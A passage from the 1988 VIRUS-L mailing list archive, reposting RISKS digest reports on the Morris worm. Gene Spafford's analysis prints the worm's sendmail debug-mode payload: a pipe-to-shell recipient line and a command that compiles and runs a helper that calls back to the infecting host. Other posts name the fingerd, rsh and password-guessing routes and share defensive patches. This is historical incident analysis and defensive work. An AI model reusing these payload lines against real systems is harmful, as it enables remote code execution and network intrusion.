  2827. both programs tried to see which one would work.
  2828.  
  2829. We quoted Henry Petroski here over a year ago to the effect that we do not
  2830. learn from our successes, but that we have an opportunity to learn from our
  2831. failures.  Once again we are presented with the opportunity to learn that many
  2832. of our computer systems have serious security vulnerabilities, and that we need
  2833. to take pains to defend against the really malicious attacks.  Strangely some
  2834. people take heart in the fact that the security attacks to date (whether
  2835. penetrations, exploitations of privilege, Trojan horses, or legitimate viruses)
  2836. have been relatively modest in scale, perhaps to justify the absence of
  2837. concern.  I am afraid that it will take a Chernobyl- or Three-Mile-Island-like
  2838. disaster before the community at large wakes up.  PGN
  2839.  
  2840. ------------------------------
  2841.  
  2842. Date: Thu, 3 Nov 88 16:32:25 EST
  2843. From: bishop@bear.Dartmouth.EDU (Matt Bishop)
  2844. Subject: More on the virus
  2845.  
  2846. ...  This program introduced itself through a bug in sendmail.  At these sites,
  2847. sendmail was compiled and installed with a debugging option turned on.  As near
  2848. as I can figure (I don't have access to the sendmail sources), by giving a
  2849. specific option to the "debug" command in sendmail (there are lots of those,
  2850. controlling what exactly you get information about) you can cause it to execute
  2851. a command.  As sendmail runs setuid to root, guess what privileges the command
  2852. is executed with.  Right.
  2853.    Apparently what the attacker did was this:  he or she connected to sendmail
  2854. (ie, telnet victim.machine 25), issued the appropriate debug command, and had
  2855. a small C program compiled.  (We have it.  Big deal.)  This program took
  2856. as an argument a host number, and copied two programs -- one ending in
  2857. q.vax.o and the other ending in .sun.o -- and tried to load and execute them.
  2858. In those cases where the load and execution succeeded, the worm did two things
  2859. (at least):  spawn a lot of shells that did nothing but clog the process table
  2860. and burn CPU cycles; look in two places -- the password file and the internet
  2861. services file -- for other sites it could connect to (this is hearsay, but I
  2862. don't doubt it for a minute.)  It used both individual .rhost files (which it
  2863. found using the password file), and any other remote hosts it could locate
  2864. which it had a chance of connecting to.  It may have done more; one of our
  2865. machines had a changed superuser password, but because of other factors we're
  2866. not sure this worm did it.
  2867.    This last part is still sketchy; I have the relevant sun.o file and will
  2868. take it apart to see just what it was supposed to do.  As of now, it appears
  2869. there was no serious damage (just wasted CPU cycles and system administrator
  2870. time).
  2871.    Two obvious points:
  2872. 1.  Whoever did this picked only on suns and vaxen.  One site with a lot
  2873.     of IRISes and two Crays (ie, NASA Ames) got bit on their Suns and Vaxen,
  2874.     but the attempt to get the other machines didn't work.
  2875. 2.  This shows the sorry state of software and security in the UNIX world.
  2876.     People should NEVER put a program with debugging hooks in it, especially
  2877.     when the hook is (or can be made) to execute an arbitrary command.  But
  2878.     that is how the sendmail which was used was distributed!
  2879.    One more interesting point:  initially, I thought an application of the
  2880. "principle of least privilege" would have prevented this penetration.  But
  2881. the attacker used a world-writeable directory to squirrel the relevant programs
  2882. in, so -- in effect -- everything could have been done by any user on the
  2883. system!  (Except the superuser password change, of course -- if this worm
  2884. did in fact do it.)
  2885.    I think the only way to prevent such an attack would have been to turn
  2886. off the deug option on sendmail; then the penetration would fail.  It goes to
  2887. show that if the computer is not secure (and like you, I don't believe there
  2888. ever will be such a beastie), there is simply no way to prevent a virus (or,
  2889. in this case, a worm) from getting into that system.
  2890.    I know this is somewhat sketchy, flabby, and fuzzy, but it's all I know
  2891. so far.  I'll keep you posted on developments ...
  2892.  
  2893. Matt
  2894.  
  2895. ------------------------------
  2896. =========================================================================
  2897. Date:         Fri, 4 Nov 88 21:07:50 CST
  2898. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  2899. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  2900. From:         James Ford <JFORD1@UA1VM>
  2901. Subject:      TCPIP bug
  2902.  
  2903. This was taken from RISKS digest.  Its rather long, but I believe
  2904. its worthy of posting here.   If you get RISKS, then you can hit the
  2905. PURGE key fast.....  :-)
  2906.  
  2907.                       James
  2908. ---------------------------------------------------------------------
  2909. Date: Fri, 04 Nov 88 00:27:54 EST
  2910. From: Gene Spafford <spaf@purdue.edu>
  2911. Subject: Updated worm report
  2912. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  2913.  
  2914. This is an updated description of how the worm works (note: it is
  2915. technically a worm, not a virus, since it does not attach itself
  2916. to other code {that we know about}):
  2917.  
  2918. All of our Vaxen and some of our Suns here were infected with the worm.  The
  2919. worm forks repeated copies of itself as it tries to spread itself, and the load
  2920. averages on the infected machines skyrocketed.  In fact, it got to the point
  2921. that some of the machines ran out of swap space and kernel table entries,
  2922. preventing login to even see what was going on!
  2923.  
  2924. The worm seems to consist of two parts.  The way that it works is as
  2925. follows:
  2926.  
  2927. 1) Virus running on an infected machine opens a TCP connection to a
  2928. victim machine's sendmail, invokes debug mode, and submits a version
  2929. of itself as a mail message.
  2930. *OR* it uses rsh to create itself on the remote machine through
  2931. an account requiring no password (due to hosts.equiv or .rhosts
  2932. entries).  *OR* it gets in via a bug in fingerd *OR* it uses telnet
  2933. (more on this later).
  2934.  
  2935. Using the sendmail route, it does something like:
  2936. From: /dev/null
  2937. To: "|sed -e 1,/^$/d | sh; exit 0"
  2938.  
  2939. cd /usr/tmp
  2940. cat > x14481910.c <<'EOF'
  2941. <text of program deleted?
  2942. EOF
  2943. cc -o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910
  2944.  x14481910.c
  2945.  
  2946.  
  2947. 2) This program is a simple "listener" or "helper" program of about a hundred
  2948. lines of fairly simple code.  As you can see, the helper is invoked with
  2949. arguments pointing back at the infecting worm (giving hostid/socket/checksum(?)
  2950. as arguments).
  2951.  
  2952. 3) The helper then connects to the "server" and copies a number of files
  2953. (presumably to /tmp).  After the files are copied, it exec's a shell with
  2954. standard input coming from the infecting worm program on the other end of the
  2955. socket.
  2956.  
  2957. From here, I speculate on what happens since I can't find the source to
  2958. this part lying around on our machines:
  2959.  
  2960. 4) The newly exec'd shell attempts to compile itself from the files copied over
  2961. to the target machine.  The command file it uses is as follows:
  2962.  
  2963. PATH=/bin:/usr/bin:/usr/ucb
  2964. rm -f sh
  2965. if [ -f sh ]
  2966. then
  2967. P=x%d
  2968. else
  2969. P=sh
  2970. cc -o $P %s
  2971. /bin/echo %s
  2972. ./$P -p $$
  2973.  
  2974. 5) This creates and dispatches the new worm..  This worm opens all the worm
  2975. source files, then unlinks the files so they can't be found (since it has them
  2976. open, however, it can still access the contents).  Next, the worm steps through
  2977. the hosts file (on the Sun, it uses YP to step through the distributed hosts
  2978. file) trying to connect to other machines' sendmail.  If a connection succeeds,
  2979. it forks a child process to infect it, while the parent continues to attempt
  2980. infection of other machines.
  2981.  
  2982. 6) The child requests and initializes a new socket, then builds and invokes a
  2983. listener with the new socket number and hostid as arguments (#1, above).
  2984.  
  2985.  
  2986. Other notes:
  2987.  
  2988. The worm runs in stages.  It first collects info from the /etc/hosts files, the
  2989. hosts.equiv file, and other files containing host names and host IP addresses.
  2990. It even runs netstat to find out what networks the machine is attached to! It
  2991. uses this information to attempt to penetrate sendmail on those machines.  It
  2992. also knows how to penetrate "fingerd" on Vaxen (on Suns, the attempt results in
  2993. a core dump).  I will privately tell individuals how to fix the bug in fingerd,
  2994. but for now change it so it does not run as "root".
  2995.  
  2996. After this first stage, it appears to sleep for a while.  Then it starts
  2997. collecting user names and it begins probing with "rsh".  It also tries to
  2998. attack the passwords by trying a set of built-in words, the contents of
  2999. /usr/dict, and words snarfed from system files.  If it succeeds in breaking a
  3000. local password, it forks a child to use telnet to break into that account and
  3001. copy itself.
  3002.  
  3003. As I write this, no one seems to know what it is supposed to eventually do.
  3004. Perhaps it just breaks in everywhere it can.  We do know that if it doesn't
  3005. break into any accounts or systems for a while, it enters a mode where it tries
  3006. to break the root password via brute force searching.  We suspect that if it
  3007. succeeds it then does very nasty things.
  3008.  
  3009. Other notes:
  3010.  
  3011. The program corrupts its argument vector, so it appears in a "ps ax" as "(sh)"
  3012. (a login shell).  Don't trust any of these if you have them running.
  3013.  
  3014. The program doesn't copy around source files (except the helper) -- it copies
  3015. around pre-compiled binaries that are linked on the local machine and then run.
  3016. The worm appears to only be carrying binaries for 68020-based Suns and Vax 7xx
  3017. and 8800 machines.  Pyramids, Sun 2's and Sequents are all definitely immune.
  3018. (Note: an infected 8800 is an awesome engine of contagion.)
  3019.  
  3020. The strings in the binaries are encrypted against a random "strings"
  3021. invocation.  If you have a binary, Keith Bostic informs me that Xor with 0x81
  3022. will reveal interesting things, although that is not the only mask used.
  3023.  
  3024. The first observation of the virus I have heard about was 6pm Wednesday night
  3025. in Pittsburgh.  It didn't hit Purdue until about 4 this morning.  We were lucky
  3026. in that other sites, like CMU and Princeton, were hit around 11 last night.
  3027.  
  3028.  
  3029. Acknowledgements:  Some of the above information was obtained from
  3030. Brian Kantor (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue), Dan
  3031. Trinkle (Purdue), Kevin Braunsdorf (Purdue) and Miek Rowan (Purdue).
  3032. Thanks, guys.
  3033.  
  3034. ------------------------------
  3035.  
  3036. Date: Thu, 03 Nov 88 21:20:10 EST
  3037. From: Gene Spafford <spaf@purdue.edu>
  3038. Subject: A worm "condom"
  3039. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  3040.  
  3041. ... Kevin Braunsdorf & Rich Kulawiec (Purdue-CC) have come up with a "condom"
  3042. to protect your machine against the CURRENT worm.  They are not 100% sure it
  3043. works, but it seems to be completely effective and it can't do any harm.  As
  3044. ROOT, do:
  3045.  
  3046. mkdir /usr/tmp/sh
  3047. chmod 111 /usr/tmp/sh
  3048.  
  3049. Then edit your rc.local file to recreate the directory in case of a reboot.
  3050. This will not stop a current infection, but it will prevent any new ones
  3051. from taking hold -- it prevents the worm from creating replicas.
  3052.  
  3053. ... --spaf
  3054.  
  3055. ------------------------------
  3056.  
  3057. Date: Thu, 03 Nov 88 22:04:15 EST
  3058. From: Gene Spafford <spaf@purdue.edu>
  3059. Subject: A cure!!!!!
  3060. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  3061.  
  3062. FLASH!!
  3063.  
  3064. Kevin ("Adb's your friend.") Braunsdorf just burst into my office
  3065. with a cure discovered in the disassembled worm binary.
  3066.  
  3067. If there is an external variable in the library named "pleasequit" that is
  3068. non-zero, the worm will die immediately after exiting.  Thus, to kill any new
  3069. worms, include a patch in your library that defines the symbol.  The following
  3070. shell file and source code will modify your C library to define this symbol.
  3071.  
  3072. It WON'T kill any currently linked and running versions, but it will
  3073. prevent reinfection.
  3074.  
  3075.  
  3076. # Shar archive.  Give the following as input to /bin/sh
  3077. #  Packed Thu Nov  3 21:56:35 EST 1988 by spaf@uther.cs.purdue.edu
  3078. #
  3079. #  This archive contains:
  3080. #    foo.sh
  3081. #    foo.c
  3082. #
  3083. #
  3084. echo x - foo.sh
  3085. sed 's/^X//' >foo.sh <<'*-*-END-of-foo.sh-*-*'
  3086. Xcc -c foo.c -o foo.o
  3087. Xcp /lib/libc.a /lib/libc.a.old
  3088. Xar q /lib/libc.a foo.o
  3089. Xranlib /lib/libc.a
  3090. *-*-END-of-foo.sh-*-*
  3091. echo x - foo.c
  3092. sed 's/^X//' >foo.c <<'*-*-END-of-foo.c-*-*'
  3093. Xextern int pleasequit = -1;
  3094. *-*-END-of-foo.c-*-*
  3095. exit
  3096. =========================================================================
  3097. Date:         Sat, 5 Nov 88 11:07:56 EDT
  3098. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3099. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3100. From:         Jean Coppola <SSAT@PACEVM>
  3101. Subject:      Re: Anti-Viral Software
  3102. In-Reply-To:  Message of Mon, 31 Oct 88 00:23:41 EST from <DAB3@LEHIGH>
  3103.  
  3104. That would be a good idea to have it on the LISTSERV.
  3105. Also could someone explain how the UUxx programs work?
  3106. =========================================================================
  3107. Date:         Sat, 5 Nov 88 11:14:35 EDT
  3108. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3109. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3110. From:         SSAT@PACEVM
  3111. Subject:      Re: Debrain.exe
  3112. In-Reply-To:  Message of Mon, 31 Oct 88 10:23:02 EST from <SHERK@UMDD>
  3113.  
  3114. For those of us new to this, how do i get a file from umd5.umd.edu
  3115. over Bitnet?
  3116. =========================================================================
  3117. Date:         Sat, 5 Nov 88 12:17:40 EST
  3118. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3119. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3120. From:         "David A. Bader" <DAB3@LEHIGH>
  3121. Subject:      UUxxx files on the Listser
  3122.  
  3123. Since Bitnet mail can only transfer data as ascii, and not as binary,
  3124. there needs to be a method to send someone a binary file over Bitnet.
  3125. UUxxxs turn a binary file into a cryptic ascii file for this purpose.
  3126. The source code for UUENCODE (the sender's encoding program) and
  3127. UUDECODE (the receiver's decoding program) are readily available over
  3128. this Listserv and many other houses of public domain software.  For
  3129. using the particular version of UUENCODE or UUDECODE, you would have to
  3130. check the docs for that particular version.
  3131.  
  3132.           David Bader
  3133.           DAB3@LEHIGH
  3134. =========================================================================
  3135. Date:         Sat, 5 Nov 88 12:21:00 EST
  3136. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3137. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3138. From:         Jim Shaffer <SHAFFERJ@BKNLVMS>
  3139. Subject:      Re: Debrain.exe
  3140.  
  3141. >For those of us new to this, how do i get a file from umd5.umd.edu
  3142. >over Bitnet?
  3143.  
  3144. You don't.
  3145.  
  3146. * FLAME ON *
  3147. Bitnet is utterly incapable of supporting FTP, due to someone's decision
  3148. to ignore the well-established TCP/IP protocol way back when Bitnet was
  3149. founded.  I'm sure there was a good reason for this at the time (probably
  3150. money), but it makes us look like fools today and I'm sick and tired of it.
  3151. * FLAME OFF *
  3152.  
  3153. =========================================================================
  3154. Date:         Sat, 5 Nov 88 12:32:31 EDT
  3155. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3156. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3157. From:         SSAT@PACEVM
  3158. Subject:      Re: Debrain.exe
  3159. In-Reply-To:  Message of Sat, 5 Nov 88 12:21:00 EST from <SHAFFERJ@BKNLVMS>
  3160.  
  3161. Great so how does someone go about requesting debrain.exe from umd5.umd.edu
  3162. =========================================================================
  3163. Date:         Sat, 5 Nov 88 12:35:36 EST
  3164. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3165. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3166. From:         ENGNBSC@BUACCA
  3167. Subject:      Re: debrain.exe & ftp...
  3168.  
  3169.  
  3170. >You don't.
  3171.  
  3172. Not necessarily.  BITNet access does not preclude Internet access!
  3173. Basically, you have to find yourself a ftp-capable site (perhaps
  3174. even your own), and go get it - just log in as anonymous.
  3175.  
  3176. >good reason at the time (probably money)...
  3177.  
  3178. You're right - BITNet was (and in places still IS) a string of
  3179. modems talking back and forth.  In the early days, most of these
  3180. links were 1200 baud modems...  Primitive, yes - but (when the
  3181. links are up :-( it gets the job done.  So you can't ftp over
  3182. it - with the instability of some of my favorite links, I really
  3183. wouldn't want to think about ftp...  besides, how would you like
  3184. to try to slurp a *REALLY* big file through a 1200 baud modem
  3185. with BITNet mail buildind up on either side of it??  No thanks.
  3186.  
  3187.  
  3188. Bruce Howells, engnbsc@buacca.bu.edu / engnbsc@buacca.BITNet
  3189.  - The opinions expressed above are mine, and do not necessarily
  3190.    represent those of Boston University, nor anyone else...
  3191. =========================================================================
  3192. Date:         Sat, 5 Nov 88 10:53:00 MST
  3193. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3194. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3195. From:         Bernie <BSWIESER@UNCAMULT>
  3196. Subject:      Re: Anybody home?
  3197. In-Reply-To:  Message of 2 Nov 88 07:28 MST from "Robert Slade"
  3198.  
  3199. Odd, I'm getting a whole bunch.  In our local newspaper, "Computer virus
  3200. wreaks U.S.  chaos" hit the print.  Greg LYPOWY was telling me this was
  3201. an SMTP virus.  Anybody have any info.  on this?  I can't really think
  3202. of how this one would work, but Greg says it logs into SMTP and get's
  3203. into a debug shell "?" and continues to trash the system.  So much for
  3204. no virus that can go between machines!  I does't sorta' make sense.
  3205. Some systems SMTP is just a dummy account that runs something to handle
  3206. sendmail.  The one here used to be so stupid as to have no password and
  3207. anyone could just control-c out of it before it ran the program.  I
  3208. gather if this virus were to then 'upload' some C code, compile it,
  3209. propagate and kill itself, that would work.  Then it wouldn't have to be
  3210. machine dependant.  BUT whoever wrote such a thing is not your average
  3211. "cracker" or "hacker".  I'd say a scientist with a venagence.  Just goes
  3212. to show admin.  is stupid for not allowing research on this topic.
  3213. They're leaving themselves and the real world open for all sorts of
  3214. problems....  Just like environmental issues....  If there's a problem,
  3215. ignore it, it'll just go away....  ha.
  3216. =========================================================================
  3217. Date:         Sat, 5 Nov 88 13:13:36 EDT
  3218. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3219. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3220. From:         Jean Coppola <SSAT@PACEVM>
  3221. Subject:      DEBRAIN.EXE
  3222.  
  3223. Can anyone tell me where DEBRAIN.EXE resides on Bitnet where it can
  3224. be requested from?
  3225. =========================================================================
  3226. Date:         Sat, 5 Nov 88 14:18:54 EDT
  3227. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3228. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3229. From:         SSAT@PACEVM
  3230.  
  3231. In a round about way I found an interesting situation.
  3232. Vfeature Deluxe from Golden Bow is for partitioning disks. However it
  3233. has a security feature called mount. When you password protect a drive
  3234. you must mount it before it can be used.
  3235.  
  3236. However even when mounted correctly, Vfeature stops low level writes
  3237. to the mounted drive, such as trying to use Fastback to restore files
  3238. to the drive.
  3239.  
  3240. I think this bears out more investigation. This might be a way to
  3241. protect a drive?
  3242. =========================================================================
  3243. Date:         Sat, 5 Nov 88 14:48:16 EST
  3244. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3245. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3246. From:         "David A. Bader" <DAB3@LEHIGH>
  3247. Subject:      Vfeature
  3248.  
  3249. I did not quite understand what exactly this "Vfeature" is or does. If
  3250. it is software, however, wouldn't there have to be another way with
  3251. software (e.g. a virus) to get around it?
  3252.  
  3253.     David Bader
  3254.     DAB3@LEHIGH
  3255. =========================================================================
  3256. Date:         Sat, 5 Nov 88 16:12:00 MST
  3257. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3258. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3259. From:         LYPOWY@UNCAMULT
  3260. Subject:      MILNET/ARPANET Virus
  3261.  
  3262.  
  3263. With the latest rumors of a virus bringing ARPANET and MILNET to their
  3264. knees, I thought it would be prudent for you all to see this from the
  3265. latest Risks digest:
  3266.  
  3267. RISKS-LIST:  RISKS-FORUM Digest Thursday 3 November 1988 Volume 7 :
  3268. Issue 69
  3269.  
  3270. ----------------------------------------------------------------------
  3271.  
  3272. Date:  Thu, 3 Nov 88 06:46 EST From:  Stoll@DOCKMASTER.ARPA Subject:
  3273. Virus on the Arpanet - Milnet
  3274.  
  3275. Re Arpanet "Sendmail" Virus attack November 3, 1988
  3276.  
  3277. Hi Gang!
  3278.  
  3279. It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't
  3280. believe everything that follows...
  3281.  
  3282. Apparently, there is a massive attack on Unix systems going on right
  3283. now.
  3284.  
  3285. I have spoken to systems managers at several computers, on both the east
  3286. & west coast, and I suspect this may be a system wide problem.
  3287.  
  3288. Symptom:  hundreds or thousands of jobs start running on a Unix system
  3289. bringing response to zero.
  3290.  
  3291. Systems attacked:  Unix systems, 4.3BSD unix & variants (eg:  SUNs) any
  3292. sendmail compiled with debug has this problem.  See below.
  3293.  
  3294. This virus is spreading very quickly over the Milnet.  Within the past 4
  3295. hours, I have evidence that it has hit >10 sites across the country,
  3296. both Arpanet and Milnet sites.  I suspect that well over 50 sites have
  3297. been hit.  Most of these are "major" sites and gateways.
  3298.  
  3299.  
  3300. Method:
  3301.  
  3302. Apparently, someone has written a program that uses a hole in SMTP
  3303. Sendmail utility.  This utility can send a message into another program.
  3304.  
  3305. Step 1:  from a distant Milnet host, a message is sent to Sendmail
  3306.        to fire up SED, (SED is an editor)  This is possible in certain
  3307.        versions of sendmail (see below).
  3308.  
  3309. 2:  A 99 line C program is sent to SED through Sendmail.
  3310.  
  3311. 3:  The distant computer sends a command to compile this C program.
  3312.  
  3313. 4:  Several object files are copied into the Unix computer.
  3314.         There are 3 files:  one targeted to Sun
  3315.                             one targeted to SUN-3
  3316.                             one targeted to vax    (ultrix probably, not vms)
  3317.  
  3318. 5:  The C program accepts as address other Milnet sites
  3319.  
  3320. 6:  Apparently, program scans for other Milnet/arpanet addresses and
  3321.      repeats this process.
  3322.  
  3323.  
  3324.  
  3325. The bug in Sendmail:
  3326.  
  3327. When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
  3328. option, there's a hole in it.
  3329.  
  3330. Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
  3331. It exists only where the system manager recompiled Sendmail and enabled
  3332. debugging.
  3333.  
  3334.  
  3335. This is bad news.
  3336.  
  3337.   Cliff Stoll dockmaster.arpa
  3338.  
  3339. ------------------------------
  3340.  
  3341. Date:  Thu, 03 Nov 88 09:52:18 EST From:  Gene Spafford
  3342. <spaf@purdue.edu> Subject:  More on the virus Organization:  SERC,
  3343. Department of Computer Sciences, Purdue Univ.
  3344.  
  3345. All of our Vaxen and some of our Suns here were infected with the virus.
  3346. The virus forks repeated copies of itself as it tries to spread itself,
  3347. and the load averages on the infected machines skyrocketed.  In fact, it
  3348. got to the point that some of the machines ran out of swap space and
  3349. kernel table entries, preventing login to even see what was going on!
  3350.  
  3351. The virus seems to consist of two parts.  I managed to grab the source
  3352. code for one part, but not the main component (the virus cleans up after
  3353. itself so as not to leave evidence).  The way that it works is as
  3354. follows:
  3355.  
  3356. 1) Virus running on an infected machine opens a TCP connection to a
  3357. victim machine's sendmail, invokes debug mode, and gets a shell.
  3358.  
  3359. 2) The shell creates a file in /tmp named $$,l1.c (where the $$ gets
  3360. replaced
  3361.  
  3362. by the current process id) and copies code for a "listener" or "helper"
  3363. program.  This is just a few dozen lines long and fairly generic code.
  3364. The shell compiles this helper using the "cc" command local to the
  3365. system.
  3366.  
  3367. 3) The helper is invoked with arguments pointing back at the infecting
  3368. virus (giving hostid/socket/passwords as arguments).
  3369.  
  3370. 4) The helper then connects to the "server" and copies a number of files
  3371. (presumably to /tmp).  After the files are copied, it exec's a shell
  3372. with standard input coming from the infecting virus program on the other
  3373. end of the socket.
  3374.  
  3375. From here, I speculate on what happens since I can't find the source to
  3376. this part lying around on our machines:
  3377.  
  3378. 5) The newly exec'd shell attempts to compile itself from the files
  3379. copied over to the target machine.  I'm not sure what else the virus
  3380. does, if anything -- it may also be attempting to add a bogus passwd
  3381. file entry or do something to the file system.  The helper program has
  3382. an array of 20 filenames for the "helper" to copy over, so there is room
  3383. to spare.  There are two versions copied -- a version for Vax BSD and a
  3384. version for SunOS; the appropriate one is compiled.
  3385.  
  3386. 6) The new virus is dispatched.  This virus opens all the virus source
  3387. files, then unlinks the files so they can't be found (since it has them
  3388. open, however, it can still access the contents).  Next, the virus steps
  3389. through the hosts file (on the Sun, it uses YP to step through the
  3390. distributed hosts file) trying to connect to other machines' sendmail.
  3391. If a connection succeeds, it forks a child process to infect it, while
  3392. the parent continues to attempt infection of other machines.
  3393.  
  3394. 7) The child requests and initializes a new socket, then builds and
  3395. invokes a listener with the new socket number and hostid as arguments
  3396. (#1, above).
  3397.  
  3398. The heavy load we see is the result of multiple viruses coming in from
  3399. multiple sites.  Since local hosts files tend to have entries for other
  3400. local hosts, the virus tends to infect local machines multiple times --
  3401. in some senses this is lucky since it helps prevent the spread of the
  3402. virus as the local machines slow down.
  3403.  
  3404. The virus also "cleans" up after itself.  If you reboot an infected
  3405. machine (or it crashes), the /tmp directory is normally cleaned up on
  3406. reboot.  The other incriminating files were already deleted by the virus
  3407. itself.
  3408.  
  3409. Clever, nasty, and definitely anti-social.
  3410.  
  3411. --spaf
  3412.  
  3413. ------------------------------
  3414.  
  3415. Date:  Thu, 3 Nov 1988 14:27:22 PDT From:  Peter Neumann
  3416. <neumann@csl.sri.com> Subject:  More on the virus attack
  3417.  
  3418. Remember that the above are preliminary messages relating to an event in
  3419. progress.  There seem to be many unanswered questions.  Perhaps someone
  3420. will contribute a definitive report to the next issue of RISKS.
  3421.  
  3422. Examination of the code suggests a fairly sophisticated person writing
  3423. relatively high quality (although undocumented) code, exploiting several
  3424. flaws that exist(ed) on many UNIX systems, and written with considerable
  3425. good practice in self-checking, reliability, etc.  From the evidence
  3426. thus far, I would guess it that this was a deliberate attack, not an
  3427. accidental experiment run astray.
  3428.  
  3429. Although it was primarily a denial of service attack, it did some
  3430. remarkable things, taking advantage of many different approaches.  The
  3431. spawned processes appear to have been doing attacks on encrypted
  3432. passwords to enable ftps (in case the .rhost attack would not work --
  3433. cf.  the Stanford breakins described in CACM and SEN by Brian Reid).
  3434. Separate versions to run on Suns and Vaxens were apparently propagated
  3435. in DES encrypted form, decrypted, and both programs tried to see which
  3436. one would work.
  3437.  
  3438. We quoted Henry Petroski here over a year ago to the effect that we do
  3439. not learn from our successes, but that we have an opportunity to learn
  3440. from our failures.  Once again we are presented with the opportunity to
  3441. learn that many of our computer systems have serious security
  3442. vulnerabilities, and that we need to take pains to defend against the
  3443. really malicious attacks.  Strangely some people take heart in the fact
  3444. that the security attacks to date (whether penetrations, exploitations
  3445. of privilege, Trojan horses, or legitimate viruses) have been relatively
  3446. modest in scale, perhaps to justify the absence of concern.  I am afraid
  3447. that it will take a Chernobyl- or Three-Mile-Island-like disaster before
  3448. the community at large wakes up.  PGN
  3449.  
  3450. ------------------------------
  3451.  
  3452. Date:  Thu, 3 Nov 88 16:32:25 EST From:  bishop@bear.Dartmouth.EDU (Matt
  3453. Bishop) Subject:  More on the virus
  3454.  
  3455. ...  This program introduced itself through a bug in sendmail.  At these
  3456. sites, sendmail was compiled and installed with a debugging option
  3457. turned on.  As near as I can figure (I don't have access to the sendmail
  3458. sources), by giving a specific option to the "debug" command in sendmail
  3459. (there are lots of those, controlling what exactly you get information
  3460. about) you can cause it to execute a command.  As sendmail runs setuid
  3461. to root, guess what privileges the command is executed with.  Right.
  3462.    Apparently what the attacker did was this:  he or she connected to
  3463. sendmail (ie, telnet victim.machine 25), issued the appropriate debug
  3464. command, and had a small C program compiled.  (We have it.  Big deal.)
  3465. This program took as an argument a host number, and copied two programs
  3466. -- one ending in q.vax.o and the other ending in .sun.o -- and tried to
  3467. load and execute them.  In those cases where the load and execution
  3468. succeeded, the worm did two things (at least):  spawn a lot of shells
  3469. that did nothing but clog the process table and burn CPU cycles; look in
  3470. two places -- the password file and the internet services file -- for
  3471. other sites it could connect to (this is hearsay, but I don't doubt it
  3472. for a minute.)  It used both individual .rhost files (which it found
  3473. using the password file), and any other remote hosts it could locate
  3474. which it had a chance of connecting to.  It may have done more; one of
  3475. our machines had a changed superuser password, but because of other
  3476. factors we're not sure this worm did it.
  3477.    This last part is still sketchy; I have the relevant sun.o file and
  3478. will take it apart to see just what it was supposed to do.  As of now,
  3479. it appears there was no serious damage (just wasted CPU cycles and
  3480. system administrator time).
  3481.    Two obvious points:  1.  Whoever did this picked only on suns and
  3482. vaxen.  One site with a lot
  3483.     of IRISes and two Crays (ie, NASA Ames) got bit on their Suns and Vaxen,
  3484.     but the attempt to get the other machines didn't work.  2.  This
  3485. shows the sorry state of software and security in the UNIX world.
  3486.     People should NEVER put a program with debugging hooks in it, especially
  3487.     when the hook is (or can be made) to execute an arbitrary command.  But
  3488.     that is how the sendmail which was used was distributed!
  3489.    One more interesting point:  initially, I thought an application of
  3490. the "principle of least privilege" would have prevented this
  3491. penetration.  But the attacker used a world-writeable directory to
  3492. squirrel the relevant programs in, so -- in effect -- everything could
  3493. have been done by any user on the system!  (Except the superuser
  3494. password change, of course -- if this worm did in fact do it.)
  3495.    I think the only way to prevent such an attack would have been to
  3496. turn off the deug option on sendmail; then the penetration would fail.
  3497. It goes to show that if the computer is not secure (and like you, I
  3498. don't believe there ever will be such a beastie), there is simply no way
  3499. to prevent a virus (or, in this case, a worm) from getting into that
  3500. system.
  3501.    I know this is somewhat sketchy, flabby, and fuzzy, but it's all I
  3502. know so far.  I'll keep you posted on developments ...
  3503.  
  3504. Matt
  3505.  
  3506. ===============================================================================
  3507.  
  3508.                     Greg Lypowy
  3509.  
  3510. P.S.  Chris Haller, what have things been like at Cornell (where this
  3511. 'virus' is purported to have emanated??
  3512.  
  3513. P.P.S.  To You All -- Is this a true virus or could we better define it
  3514. as a
  3515.           worm??
  3516. =========================================================================
  3517. Date:         Sat, 5 Nov 88 21:39:33 CDT
  3518. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3519. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3520. From:         Len Levine <len@EVAX.MILW.WISC.EDU>
  3521. Subject:      Re: comments on EEV vs FEV
  3522. In-Reply-To:  Message from "Ken van Wyk" of Nov 3, 88 at 10:02 am
  3523.  
  3524. The point I was trying to make with the FEV and the EEV was that the
  3525. fix for an EEV is to fix a problem.  The fix for an FEV is to remove
  3526. the feature, or live with the virus.
  3527.  
  3528. As an example, the recent UNIX virus depended in one respect on a
  3529. Feature of the sendmail program (debug) and not on an error.  The
  3530. debug feature was to powerful to leave in the system, UNIX worked just
